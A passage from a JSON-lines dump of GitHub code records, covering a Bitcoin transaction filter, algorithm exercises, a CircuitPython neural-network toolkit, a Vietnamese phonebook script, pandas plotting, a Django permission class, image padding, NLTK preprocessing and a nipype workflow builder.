rpc.getrawtransaction(tx['txid'], True)\n ins = tx['vin']\n outs = tx['vout']\n\n skip = 0\n # skip all txes that contain \"op_return\"\n for tx_output in outs:\n script = tx_output['scriptPubKey']\n if script['type'] == \"nulldata\":\n skip = 1\n break\n elif re.search(pattern, tx_output['scriptPubKey']['asm']) is not None:\n f2.write(\"%s: %s\\n\"%(tx['txid'], tx_output['scriptPubKey']['asm']))\n\n if skip == 1:\n continue\n\n for i in range(len(ins)):\n tx_input = ins[i]\n asm_list = tx_input['scriptSig']['asm'].split(' ')\n if len(asm_list[-1]) % 2 != 0 or re.search('[^0-9a-f]+', asm_list[-1]) is not None:\n continue\n asm = rpc.decodescript(asm_list[-1])['asm']\n if re.search(pattern, tx_output['scriptPubKey']['asm']) is not None:\n f.write(\"%s: %s\\n\"%(tx['txid'], asm))\n\n # with mysql.cursor() as cursor:\n # cursor.execute(\n # \"INSERT INTO btc_transactions.pruned_multisig_strict (`id`, `txid`, `height`) VALUES (%s, '%s', %s, '%s', '%s')\" % (\n # counter, tx['txid'], height))\n # counter += 1\n\n # mysql.commit()\n\nf.close()\nf2.close()\nmysql.close()\n","repo_name":"yongjian-hu/btc_mixing_detection","sub_path":"finder/prune_fe.py","file_name":"prune_fe.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29164055635","text":"\"\"\"\nGiven an array perm[] of size N denoting a number. Find its next permutation. ie- rearrange the digits into the lexicographically next greater permutation. If such arrangement is not possible, it must be rearranged as the lowest possible order ie, sorted in an ascending order.\n\n\nExample 1:\n\nInput:\nN = 6\nperm[] = {1, 2, 3, 6, 5, 4}\nOutput: 1 2 4 3 5 6\nExplanation: 124356 > 123654 and is the \nlexicographically next permutation.\n\nExample 2:\n\nInput:\nN = 4\nperm[] = {4, 3, 2, 1}\nOutput: 1 2 3 4\nExplanation: Since 4321 can not be rearranged\nto produce a bigger number, it is rearranged \nis ascending order.\n\n\"\"\"\n\n\nclass Solution:\n def nextPermutation(self,perm,N):\n idx=0\n for i in range(N-1)[::-1]:\n if perm[i]= (CONF_THRESHOLD / 100)]\n\nprint(f\"Processing {len(given_conf_sections)} sections at {CONF_THRESHOLD}% confidence for config {sys.argv[-2]}...\")\n\nif DRY_RUN:\n exit()\n\nif not os.path.exists(HIGH_CONF_DIR):\n os.mkdir(HIGH_CONF_DIR)\n\nqj.save_file(\n f\"{HIGH_CONF_DIR}/confidences_{RUN_NAME}_{version_name}.json\",\n confidences\n)\nqj.save_file(\n f\"{HIGH_CONF_DIR}/expert_review.json\",\n {s : \"waiting_for_review\" for s in given_conf_sections}\n)\n\n\nfor section_name in given_conf_sections:\n\n print(f\"Saving for section {section_name} with confidence {confidences[section_name]:0.4f}...\")\n\n if PRE_PROC_TYPE != \"raw\":\n blue_adjusted = io.imread(f\"{ADJUSTED_DIR}/{section_name}_1_{PRE_PROC_TYPE}.png\")\n green_adjusted = io.imread(f\"{ADJUSTED_DIR}/{section_name}_2_{PRE_PROC_TYPE}.png\")\n else:\n blue_adjusted = io.imread(f\"{DATA_DIR}/{section_name}_1_{PRE_PROC_TYPE}.png\")\n green_adjusted = io.imread(f\"{DATA_DIR}/{section_name}_2_{PRE_PROC_TYPE}.png\")\n\n ground_truth = io.imread(f\"{PREDICTIONS_DIR}/pred_{section_name}.png\")\n\n # height, width = ground_truth.shape[:2]\n\n blue = np.dstack((blue_adjusted, blue_adjusted, blue_adjusted))\n green = np.dstack((green_adjusted, green_adjusted, green_adjusted))\n\n tif.imwrite(f\"{HIGH_CONF_DIR}/{section_name}.tif\", blue, compress=6, append=True)\n tif.imwrite(f\"{HIGH_CONF_DIR}/{section_name}.tif\", green, compress=6, append=True)\n tif.imwrite(f\"{HIGH_CONF_DIR}/{section_name}.tif\", ground_truth, compress=6, append=True)\n\n\nprint(\"Done.\")\n","repo_name":"nervecenter/bsp-experiment","sub_path":"choose_threshold_sections.py","file_name":"choose_threshold_sections.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42234674171","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\n\n\nleaderboard = [\n 'Atelectasis', 'Cardiomegaly', 'Consolidation', 'Edema', 'Pleural Effusion']\n\n\ndef make_plot(fp_csv_in, fp_img_out):\n df = pd.read_csv(fp_csv_in)\n # add a * for leaderboard classes\n df.columns = [x+(\"*\" if x in leaderboard else \"\") for x in df.columns]\n z = df[df.columns[-14:]].melt(var_name='Diagnostic Class')\n z[\"count\"] = 1\n z = (z\n .replace(-1,2) # set uncertain values as 2\n .fillna(-2) # set missing values as -2\n .groupby([\"Diagnostic Class\", \"value\"]).count().unstack(\"value\") # [[(\"count\", 0.0), (\"count\", 1.0)]\n .droplevel(None, axis=1))\n cols = {-2: '- (Missing)', 0: '-', 1: '+', 2: 'Uncertain'}\n z.columns = [cols[k] for k in z.columns]\n fig, ax = plt.subplots(figsize=(5.2,3))\n z.plot.barh(stacked=True, ax=ax)\n ax.legend(loc='lower left')\n plt.tight_layout()\n plt.savefig(fp_img_out, bbox_inches='tight')\n print(fp_img_out)\n\n\nmake_plot(\n './data/CheXpert-v1.0-small/train.csv',\n './results/plots/chexpert_class_distribution_TRAIN.png')\nmake_plot(\n './data/CheXpert-v1.0-small/valid.csv',\n './results/plots/chexpert_class_distribution_TEST.png')\n","repo_name":"adgaudio/DeepFixCX","sub_path":"bin/plot_chexpert_class_distribution.py","file_name":"plot_chexpert_class_distribution.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"5913664712","text":"class Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n total = 0\n visited = defaultdict(int)\n count = 0\n visited[0] = 1\n \n for val in nums:\n total += val\n count += visited.get(total - k,0)\n visited[total] += 1 \n \n return count\n ","repo_name":"Misganaw-Berihun/LeetCode","sub_path":"560-subarray-sum-equals-k/560-subarray-sum-equals-k.py","file_name":"560-subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1125991957","text":"\"\"\"The prime factors of 13195 are 5, 7, 13 and 29.\n\nWhat is the largest prime factor of the number 600851475143\"\"\"\n\n#the number they gave is too big too simply brute force\n#b/c listing all numbers from 1 to 600851475143 causes overflow\n\nimport math\nfrom datetime import datetime\n\nstartTime = datetime.now() #to measure speed\n\n\nn = 600851475143\n# if I wanted to make this interactive \n# n = int(input(\"What positive integer do you want the prime factorization of?\"))\nfactors = []\nnotprimefactors = []\nprimefactors = []\n\n#for every factor of n under the sqrt(n), there is one\n#factors of n over the sqrt(n)\n#we take advantage of this fact in the below function\n\n\n#this gets every factor\ndef factorization(p):\n for divisors in range(2,math.floor(math.sqrt(n))+1):\n if p % divisors == 0:\n factors.append(int(divisors))\n factors.append(int(p / divisors))\n\n#this gets every nonprime factor\ndef getnonprimes():\n for notprime in factors:\n for ints in range(2,math.floor(math.sqrt(notprime))):\n if notprime % ints == 0:\n notprimefactors.append(notprime)\n\n#every element of factor that is NOT in notprimefactors\n#gets added to primefactors\ndef getprimes():\n for primes in factors:\n if primes not in notprimefactors:\n primefactors.append(primes)\n \nfactorization(n)\ngetnonprimes()\ngetprimes()\n\nif primefactors == []:\n print(n)\nelse:\n print(max(primefactors))\n\nprint(datetime.now()-startTime)\n","repo_name":"choandrew/Project-Euler-with-Python","sub_path":"Project Euler 3 general.py","file_name":"Project Euler 3 general.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39161271006","text":"\"\"\"\nCircuit Python machine learning tool kit\n\nThis library combines and provides functionality relevant to making neural networks on devices.\n\nLibrary by Dexter R. Shepherd\nUniversity of Sussex PhD student\n\n\"\"\"\n\nimport ulab.numpy as np\nimport random\nimport math as maths\n\n\"\"\"\ngenerate a normal distribution randomized\n@param: Mean is the mean of the normal\n@param: StdDev is the standard deviation of the normal\n@param: size is the shape of the matrix\n\"\"\"\ndef normal(mean=0,std=0.5,size=[5]):\n num=1\n for i in size:\n num*=i\n ar=np.zeros(size)\n ar=ar.flatten() #generate numpy\n secondary=np.zeros(num*10)\n for i in range(0,num*10 -1,2):\n X=maths.sqrt(abs(-2 * maths.log(i+1/num))) * maths.cos(2*maths.pi * i+1/num)\n #Y=maths.sqrt(abs(-2 * maths.log(i+1/num))) * maths.sin(2*maths.pi * i+1/num)\n X_ = mean + std * X\n X_n = mean - std * X\n #Y_ = mean + std * Y\n secondary[i]=X_\n secondary[i+1]=X_n\n for i in range(num): #select only from the random variables\n ar[i]=secondary[random.randint(0,num*10 -1)]\n return ar.reshape(size)\n\n\"\"\"\nget the mean squared error\n@param: y the truth data\n@param: y_pred the model predictions\n\"\"\"\ndef MSE(y,y_pred):\n s=y - y_pred\n d=s**2\n mse = np.mean(d)\n return mse\n\n\"\"\"\ngenerate a layer to hold information on network\n@param: nodes_in is the number of inputs to this layer\n@param: nodes_out is the number of nodes in the next layer\n@param: vals is whether the user wishes to manually set the weights\n\"\"\"\nclass Layer:\n def __init__(self,nodes_in,nodes_out,vals=None,activ=None):\n if type(vals)==type(None):\n self.matrix=normal(size=(nodes_out,nodes_in)) #generate random weights\n else:\n self.matrix=vals.reshape((nodes_out,nodes_in)) #generate set weights\n self.vals=vals\n self.bias=None\n self.activation_func=activ\n if type(activ)==type(None):\n self.activation_func=self.activation_\n self.a = 0 # defines the output of the layer after running through activation\n self.z = 0 # defines the input of layer to the activation function\n def getShape(self): #return the shape of the matrix\n return self.matrix.shape\n def setBias(self,bias):\n self.bias=bias\n def activation_(self,inputs):\n #activation functions\n self.z=inputs\n self.a = 1/(1 + np.exp(-self.z))\n return self.a\n def activation_grad(self):\n return self.a * (1 - self.a)\n def T(self):\n return self.matrix.transpose()\n def setWeight(self,val):\n val=np.array(val)\n val=val.reshape(self.getShape())\n self.matrix=val\n\n\"\"\"\nThe network that combines all the layers together\n@param: num_out is how many nodes in the output layer\n\"\"\"\nclass Network:\n def __init__(self,num_out):\n self.network=[]\n self.num_out=num_out\n \"\"\"\n Adds a layer to the network\n @param: nodes\n @param: vals\n @param: act\n \"\"\"\n def add_layer(self,nodes,vals=None,act=None):\n layer=Layer(nodes,self.num_out,vals=vals,activ=act) #default x by y\n if len(self.network)>0: #there are previous nodes\n layer=self.network[-1]\n bias=self.network[-1].bias\n activation=layer.activation_func\n num=layer.getShape()\n val=layer.vals\n layer=Layer(num[1],nodes,vals=val,activ=activation)\n layer.setBias(bias)\n self.network[-1]=layer #correct output of matrices before\n layer=Layer(nodes,self.num_out,vals=vals,activ=act) #generate layer with correct matrices\n self.network.append(layer) #add the layer to the network\n \"\"\"\n adds bias to the network\n @param: vals\n \"\"\"\n def add_bias(self,vals=None):\n assert len(self.network)>0, \"Network is empty. Add layers\"\n size=self.network[-1].getShape() #get the end sizing to add on\n if type(vals)==type(None):\n vals=normal(size=(size,1))\n self.network[-1].setBias(vals) #set the bias in the current end layer\n \"\"\"\n @param: inp\n @return: x\n \"\"\"\n def forward(self,inp):\n x=inp\n #self.network[0].a=x.copy()\n for i in range(len(self.network)):\n x=np.dot(self.network[i].matrix,x)\n if type(self.network[i].bias)!=type(None):\n x+=self.network[i].bias\n x=self.network[i].activation_func(x)\n self.network[i].a=x.copy()\n\n return x\n \"\"\"\n show all the network layers and biases\n \"\"\"\n def show(self):\n #show all the network layers and biases\n for i in range(len(self.network)):\n print(\"Layer\",i+1,\", nodes:\",self.network[i].getShape(),\", biases:\",self.network[i].bias)\n \"\"\"\n @param: inputData\n @param: y_data\n @param: epochs\n @param: learning_rate\n \"\"\"\n def train(self,inputData,y_data,epochs,learning_rate):\n #update all the weights via the MSE\n correct=0\n x,y=inputData.shape\n X_data=inputData.reshape((y,x))\n for epoch in range(epochs):\n correct=0\n #calculate loss\n preds=self.forward(X_data) #get forward pass\n loss = (preds-y_data.transpose())**2 #get loss\n loss= np.sum(np.sum(loss, axis=0)) #calculate overall loss\n\n #calculate gradients\n grad_h = 2.*(preds-y_data.transpose())\n for i in reversed(range(len(self.network))):\n grad_W=np.dot(grad_h,self.network[i-1].a.transpose())\n grad_h=np.dot(self.network[i].matrix.transpose(),grad_h)\n assert grad_W.shape==self.network[i].matrix.shape, \"matrix incorrect got \"+str(grad_W.shape)+\"but expected \"+str(self.network[2].matrix.shape)\n self.network[i].matrix-=1e-2 * grad_W * learning_rate#learning rate\n #calculate accuracy and display\n p=preds.transpose()\n for i in range(len(y_data)):\n c=0\n for k in range(len(y_data[i])):\n if round(p[i][k])==round(y_data[i][k]):\n c+=1\n if c==len(y_data[i]):\n correct+=1\n print(\"epoch\",epoch+1,\"Loss:\",loss,\"Accuracy:\",(correct/len(y_data))*100,\"%\")\n def trainGA(self,inputData,y_data,epochs,learning_rate,fitnessFunc=None):\n x,y=inputData.shape\n X_data=inputData.reshape((y,x))\n def fitness(y,pred): #default fitness function\n correct=0\n p=preds.transpose()\n for i in range(len(y)): #calculate how correct the prediction was\n c=0\n for k in range(len(y[i])):\n if round(p[i][k])==round(y[i][k]):\n c+=1\n if c==len(y[i]):\n correct+=1\n return correct/len(y)\n def mutate(matrix,rate): #mutate the matrix going in\n shap=matrix.shape\n flat1=matrix.flatten()\n new=normal(mean=0,std=1,size=flat1.shape) #add noise\n for i in range(len(flat1)):\n if random.random() arr[j + 1]:\n swap = True\n print(f'swap {arr[j]} and {arr[j+1]}')\n temp = arr[j]\n arr[j] = arr[j + 1]\n arr[j + 1] = temp\n else:\n print('no swap')\n\n print(' '.join([str(i) for i in range(n)]))\n print(' '.join([str(a) for a in arr]))\n if not swap:\n print('DONE EARLY')\n break\n\n return arr\n \ndef insertion(arr):\n n = len(arr)\n for i in range(n):\n for j in range(i):\n if arr[i - j] < arr[i - j - 1]:\n temp = arr[i - j]\n arr[i - j] = arr[i - j - 1]\n arr[i - j - 1] = temp\n else:\n break\n\n return arr\n \n\n# simple binary search\ndef binarySearch(arr, v):\n n = len(arr)\n\n if n == 0:\n return False\n if n == 1:\n return arr[0] == v\n\n return binarySearch(arr[:n//2], v) or binarySearch(arr[n//2:], v)\n\n \n\n# binary search with index return\ndef binarySearch2(arr, v, index=0):\n n = len(arr)\n\n if n == 0:\n return math.inf\n if n == 1:\n if arr[0] == v:\n return index\n else:\n return math.inf\n\n left = binarySearch2(arr[:n//2], v, index) # returns n in range(-1, n)\n right = binarySearch2(arr[n//2:], v, index + n//2) # returns n in range(-1, n)\n\n return min(left, right)\n\n\n# now what?\n# binary insertion sort\n# binary search the virtual list\n# \n","repo_name":"Brandon-Spicer/getSorted","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31122808571","text":"# Bài 16: Viết chương trình quản lý danh bạ điện thoại như sau:\n# 1. Người dùng chọn chức năng 1: xem danh bạ điện thoại (in ra 2 cột gồm sđt và tên)\n# 2. Người dùng chọn chức năng 2: cập nhật lại tên thông qua số điện thoại\n# 3. Người dùng chọn chức năng 3: thêm mới số điện thoại vào danh bạ\n# 4. Người dùng chọn chức năng 4: xóa liên hệ ra khỏi danh bạ \n# 5. Người dùng tìm kiếm số điện thoại thông qua tên\n# 6. Nếu người dùng chọn các chức năng khác 4 chức năng trên thì thông báo tác vu sai và thoát khỏi chương trình.\n# Dữ liệu khởi tạo: danh_ba={ '0989741258':'Johnny','0903852147':'Katherine','0903712712':'Johnny'}\ndanh_ba={ '0989741258':'Johnny','0903852147':'Katherine','0903712712':'Johnny'}\nprint(danh_ba)\nprint(type(danh_ba))\nprint(danh_ba.items())\nprint(type(danh_ba.items()))\nwhile True:\n print(\"1: xem danh bạ điện thoại\")\n print(\"2: cập nhật lại tên thông qua số điện thoại\")\n print(\"3: thêm mới số điện thoại vào danh bạ\")\n print(\"4: xóa liên hệ ra khỏi danh bạ \")\n print(\"5: Tìm kiếm số diện thoại\")\n _tacvu=input(\"Nhập tác vụ muốn thực hiện\")\n if _tacvu==\"1\":\n print(\"{:15}{:15}\".format(\"SĐT\",\"Tên\"))\n for k,v in danh_ba.items():\n print(\"{:15}{:15}\".format(k,v))\n elif _tacvu==\"2\":\n sdt=input(\"Nhập số điện thoại cần tìm\")\n if sdt in danh_ba:\n #kiểu dữ liệu dict sẽ tự hiểu biến sdt là key - quy định là vậy\n ten=input(\"Nhập tên sẽ cập nhật\")\n danh_ba[sdt]=ten\n else:\n print(\"Số điện thoại không tồn tại\")\n elif _tacvu==\"3\":\n # pass\n sdt=input(\"Nhập số điện thoại cần thêm\")\n if sdt not in danh_ba:\n #kiểu dữ liệu sẽ mặc định thêm vào cuối dictionary nếu ko tồn tại\n ten=input(\"Nhập tên\")\n danh_ba[sdt]=ten\n else:\n print(\"Số điện thoại đã tồn tại, vui lòng cập nhật thông tin bằng tác vụ 2\")\n elif _tacvu==\"4\":\n # pass\n sdt=input(\"Nhập số điện thoại cần tìm\")\n if sdt in danh_ba:\n del(danh_ba[sdt])\n print(\"Xóa thành công\")\n else:\n print(\"Số điện thoại không tồn tại trong danh bạ\")\n elif _tacvu==\"5\":\n ten=input(\"Nhập tên cần tìm\")\n _ketqua={}\n for k,v in danh_ba.items():\n if ten.upper()==v.upper():\n _ketqua[k]=v\n if len(_ketqua)>0:\n print(\"{:15}{:15}\".format(\"SĐT\",\"Tên\"))\n for k,v in _ketqua.items():\n print(\"{:15}{:15}\".format(k,v))\n else:\n print(\"Không có trong danh bạ\")\n else:\n print(\"Dừng chương trình\")\n break","repo_name":"jamesle1308/python001","sub_path":"Week3/dict_bt16.py","file_name":"dict_bt16.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36532923118","text":"from rest_framework.permissions import BasePermission\nfrom .models import Message\n\nclass IsOwner(BasePermission):\n \"\"\"Custom permission class to allow only message owners to edit them.\"\"\"\n\n def has_object_permission(self, request, view, obj):\n \"\"\"Return True if permission is granted to the message owner.\"\"\"\n if isinstance(obj, Message):\n return obj.user == request.user\n return obj.user == request.user\n","repo_name":"markmorcos/Botler.io","sub_path":"server/api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31301779714","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\n# Import data (Make sure to parse dates. Consider setting index column to 'date'.)\ndf = pd.read_csv('fcc-forum-pageviews.csv')\ndf = df.set_index('date')\n# Clean data\ndf = df[\n (df['value'] >= (df['value'].quantile(0.025))) & \n (df['value'] <= (df['value'].quantile(0.975))) \n ]\ndf.index = pd.to_datetime(df.index)\n\n\ndef draw_line_plot():\n \n# Draw line plot\n fig = plt.figure(figsize=(15,10))\n plt.plot(df.index, df['value'],color='red')\n plt.title('Daily freeCodeCamp Forum Page Views 5/2016-12/2019')\n plt.xlabel('Date')\n plt.ylabel('Page Views')\n\n # Save image and return fig (don't change this part)\n fig.savefig('line_plot.png')\n return fig\n\ndef draw_bar_plot():\n # Copy and modify data for monthly bar plot\n\n df_bar = df.copy()\n df_bar.reset_index(inplace=True)\n df_bar['Years'] = [d.year for d in df_bar.date]\n df_bar['Months'] = [d.strftime('%b') for d in df_bar.date]\n df_bar = df_bar.groupby([\"Years\", \"Months\"])[\"value\"].mean()\n df_bar = df_bar.unstack()\n\n clist_new = [\"Jan\",\"Feb\", \"Mar\", \"Apr\", \"May\",\"Jun\",\"Jul\",\"Aug\", \"Sep\",\"Oct\",\"Nov\",\"Dec\"]\n df_bar = df_bar[clist_new]\n \n # Draw bar plot\n fig = df_bar.plot(kind =\"bar\", legend = True, figsize = (15,10)).figure\n plt.xlabel(\"Years\", fontsize= 10)\n plt.ylabel(\"Average Page Views\", fontsize= 10)\n plt.legend(fontsize = 10, title=\"Months\",labels=[\"January\",\"February\", \"March\", \"April\", \"May\",\"June\",\"July\",\"August\", \"September\",\"October\",\"November\",\"December\"])\n\n # Save image and return fig (don't change this part)\n fig.savefig('bar_plot.png')\n return fig\n\ndef draw_box_plot():\n # Prepare data for box plots\n df_box = df.copy()\n df_box.reset_index(inplace=True)\n df_box['year'] = [d.year for d in df_box.date]\n df_box['month'] = [d.strftime('%b') for d in df_box.date]\n\n # Draw box plot\n fig,ax = plt.subplots(nrows=1,ncols=2)\n fig.set_size_inches(12, 5)\n fig.tight_layout(pad=4)\n sns.boxplot(x = df_box['year'], y = df_box['value'], ax = ax[0]).set(xlabel='Year', ylabel='Page Views')\n sns.boxplot(x = df_box['month'], y = df_box['value'],order=[\"Jan\",\"Feb\", \"Mar\", \"Apr\", \"May\",\"Jun\",\"Jul\",\"Aug\", \"Sep\",\"Oct\",\"Nov\",\"Dec\"], ax = ax[1]).set(xlabel='Month', ylabel='Page Views')\n\n ax[0].set_title('Year-wise Box Plot (Trend)')\n ax[1].set_title('Month-wise Box Plot (Seasonality)')\n\n\n # Save image and return fig (don't change this part)\n fig.savefig('box_plot.png')\n return fig","repo_name":"Pierre-Andreatta/FreeCodeCamp","sub_path":"Data_Analysis_with_Python/time_series_visualizer.py","file_name":"time_series_visualizer.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"44296010254","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function, division\n\nimport json\nimport math\nfrom .abstract_transform import AbstractTransform\nimport numpy as np\n\nclass Pad(AbstractTransform):\n \"\"\"\n Pad the image (shape [C, D, H, W] or [C, H, W]) to an new spatial shape, \n the real output size will be max(image_size, output_size)\n \"\"\"\n\n def __init__(self, output_size, ceil_mode=False):\n \"\"\"\n output_size (tuple/list): the size along each spatial axis. \n ceil_mode (bool): if true, the real output size is integer multiples of output_size.\n \"\"\"\n self.output_size = output_size\n self.ceil_mode = ceil_mode\n\n def __call__(self, sample):\n image = sample['image']\n input_shape = image.shape\n input_dim = len(input_shape) - 1\n if (self.ceil_mode):\n multiple = [int(math.ceil(float(input_shape[1 + i]) / self.output_size[i])) \\\n for i in range(input_dim)]\n output_size = [multiple[i] * self.output_size[i] \\\n for i in range(input_dim)]\n else:\n output_size = self.output_size\n margin = [max(0, output_size[i] - input_shape[1 + i]) for i in range(input_dim)]\n margin_lower = [int(margin[i] / 2) for i in range(input_dim)]\n margin_upper = [margin[i] - margin_lower[i] for i in range(input_dim)]\n pad = [(margin_lower[i], margin_upper[i]) for i in range(input_dim)]\n pad = tuple([(0, 0)] + pad)\n\n image_t = np.pad(image, pad, 'constant', constant_values=0) if (max(margin) > 0) else image\n\n sample['image'] = image_t\n\n if 'coord' in sample:\n sample['coord'] = sample['coord'] + margin_lower\n if 'label' in sample:\n label = sample['label']\n label = np.pad(label, pad, 'constant', constant_values=0) if (max(margin) > 0) else label\n sample['label'] = label\n if 'mask' in sample:\n mask = sample['mask']\n mask = np.pad(mask, pad, 'constant', constant_values=0) if (max(margin) > 0) else mask\n sample['mask'] = mask\n\n return sample\n","repo_name":"FeijiangHan/CTISPED","sub_path":"AANet-3D/transform/pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"39"} +{"seq_id":"39332163950","text":"from utilities import load_data_csv_to_dataframe\nimport nltk\nimport string\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom utilities import save_data_dataframe_to_csv\nnltk.download('punkt')\nnltk.download('stopwords')\n\n\ndef preprocess_file(filename):\n data = load_data_csv_to_dataframe(filename)\n for index, row in data.iterrows():\n text = row['comment_text']\n text = remove_puntucation(text)\n text = tokennize(text)\n text = fileter_stopwords(text)\n row['comment_text'] = text\n data.at[index,'comment_text'] = text\n\n return data\n\n\ndef remove_puntucation(sentence):\n sentence = \"\".join([char for char in sentence if char not in string.punctuation])\n return sentence\n\n\ndef tokennize(sentece):\n\n words = word_tokenize(sentece)\n return words\n\ndef fileter_stopwords(words):\n stop_words = stopwords.words('english')\n words = [word for word in words if word not in stop_words]\n return words\n\ndef stemming(words):\n porter = PorterStemmer()\n words = [porter.stem(word) for word in words]\n return words\n\n\n","repo_name":"deveshiitkgp2013/NLP_Project","sub_path":"data_preprocessing/nltk_preprocessing.py","file_name":"nltk_preprocessing.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41112672174","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWorkflows to grab input file structures.\n\"\"\"\nimport logging as log\nimport os\n\nimport nipype.pipeline.engine as pe\nfrom hansel.operations import joint_value_map, valuesmap_to_dict\nfrom nipype.interfaces.io import DataSink\nfrom nipype.interfaces.utility import IdentityInterface\n\nfrom neuro_pypes import configuration\nfrom neuro_pypes.crumb import DataCrumb\nfrom neuro_pypes.utils import extend_trait_list, joinstrings\n\n\ndef build_crumb_workflow(wfname_attacher, data_crumb, in_out_kwargs, output_dir,\n cache_dir='', wf_name=\"main_workflow\"):\n \"\"\" Returns a workflow for the give `data_crumb` with the attached workflows\n given by `attach_functions`.\n\n Parameters\n ----------\n wfname_attacher: dict[Str] -> function\n Dictionary with name of the workflow and its corresponding\n attach function that will be in charge of attaching workflows\n to the main input/output workflow.\n\n data_crumb: hansel.Crumb\n The crumb until the subject files.\n Example: Crumb('/home/hansel/cobre/raw/{subject_id}/session_1/{modality}/{image_file})\n At least one crumb arguments of `data_crumb` must be open,\n this argument will be replaced by the corresponding image name.\n\n in_out_kwargs: dict with keyword arguments\n This arguments are for the in_out_crumb_wf.\n Mainly 'files_crumb_args' which will declare the values each file\n type the crumb arguments in `data_crumb` must be replaced with.\n Example:\n {'anat': [('modality', 'anat_1'),\n ('image', 'mprage.nii.gz')],\n 'rest': [('modality', 'rest_1'),\n ('image', 'rest.nii.gz')],\n }\n\n cache_dir: str\n The working directory of the workflow.\n\n output_dir: str\n The output folder path.\n\n wf_name: str\n Name of the main workflow.\n\n Returns\n -------\n wf: Nipype Workflow\n \"\"\"\n if not data_crumb.exists():\n raise IOError(\"Expected an existing folder for `data_crumb`, got {}.\".format(data_crumb))\n\n if not data_crumb.isabs():\n raise IOError(\"Expected an absolute Crumb path for `data_crumb`, got {}.\".format(data_crumb))\n\n if not wfname_attacher or wfname_attacher is None:\n raise ValueError(\n \"Expected `wfname_attacher` to have at least one function, \"\n \"got {}.\".format(wfname_attacher)\n )\n\n # if not in_out_kwargs or in_out_kwargs is None:\n # raise ValueError(\"Expected `in_out_kwargs` to have at least the name for sets of parameters for \"\n # \" `data_crumb`, got {}.\".format(in_out_kwargs))\n\n # check some args\n if not cache_dir:\n cache_dir = os.path.join(os.path.dirname(output_dir), \"wd\")\n\n # print the configuration parameters\n log.info('Using the following configuration parameters:')\n log.info(configuration)\n\n # generate the workflow\n main_wf = crumb_wf(\n work_dir=cache_dir,\n data_crumb=data_crumb,\n output_dir=output_dir,\n file_templates=in_out_kwargs,\n wf_name=wf_name\n )\n\n for wf_name, attach_wf in wfname_attacher.items():\n main_wf = attach_wf(main_wf=main_wf, wf_name=wf_name)\n\n # move the crash files folder elsewhere\n main_wf.config[\"execution\"][\"crashdump_dir\"] = os.path.join(main_wf.base_dir, main_wf.name, \"log\")\n\n log.info('Workflow created.')\n\n return main_wf\n\n\ndef crumb_wf(work_dir, data_crumb, output_dir, file_templates,\n wf_name=\"main_workflow\"):\n \"\"\" Creates a workflow with the `subject_session_file` input nodes and an empty `datasink`.\n The 'datasink' must be connected afterwards in order to work.\n\n Parameters\n ----------\n work_dir: str\n Path to the workflow temporary folder\n\n data_crumb: hansel.Crumb\n The crumb until the subject files.\n Example: Crumb('/home/hansel/data/{subject_id}/{session_id}/{modality}/{image_file})\n\n output_dir: str\n Path to where the datasink will leave the results.\n\n file_templates: Dict[str -> list of 2-tuple]\n Maps of crumb argument values to specify each file in the `data_crumb`.\n Example: {'anat': [('modality', 'anat'), ('image_file', 'anat_hc.nii.gz')],\n 'pet': [('modality', 'pet'), ('image_file', 'pet_fdg.nii.gz')],\n }\n\n wf_name: str\n Name of the main workflow\n\n Returns\n -------\n wf: Workflow\n \"\"\"\n # create the root workflow\n wf = pe.Workflow(name=wf_name, base_dir=work_dir)\n\n # datasink\n datasink = pe.Node(\n DataSink(parameterization=False, base_directory=output_dir, ),\n name=\"datasink\"\n )\n\n # input workflow\n # (work_dir, data_crumb, crumb_arg_values, files_crumb_args, wf_name=\"input_files\"):\n select_files = pe.Node(\n DataCrumb(crumb=data_crumb, templates=file_templates, raise_on_empty=False),\n name='selectfiles'\n )\n\n # basic file name substitutions for the datasink\n undef_args = select_files.interface._infields\n substitutions = [(name, \"\") for name in undef_args]\n substitutions.append((\"__\", \"_\"))\n\n datasink.inputs.substitutions = extend_trait_list(datasink.inputs.substitutions,\n substitutions)\n\n # Infosource - the information source that iterates over crumb values map from the filesystem\n infosource = pe.Node(interface=IdentityInterface(fields=undef_args), name=\"infosrc\")\n infosource.iterables = list(valuesmap_to_dict(joint_value_map(data_crumb, undef_args)).items())\n infosource.synchronize = True\n\n # connect the input_wf to the datasink\n joinpath = pe.Node(joinstrings(len(undef_args)), name='joinpath')\n\n # Connect the infosrc node to the datasink\n 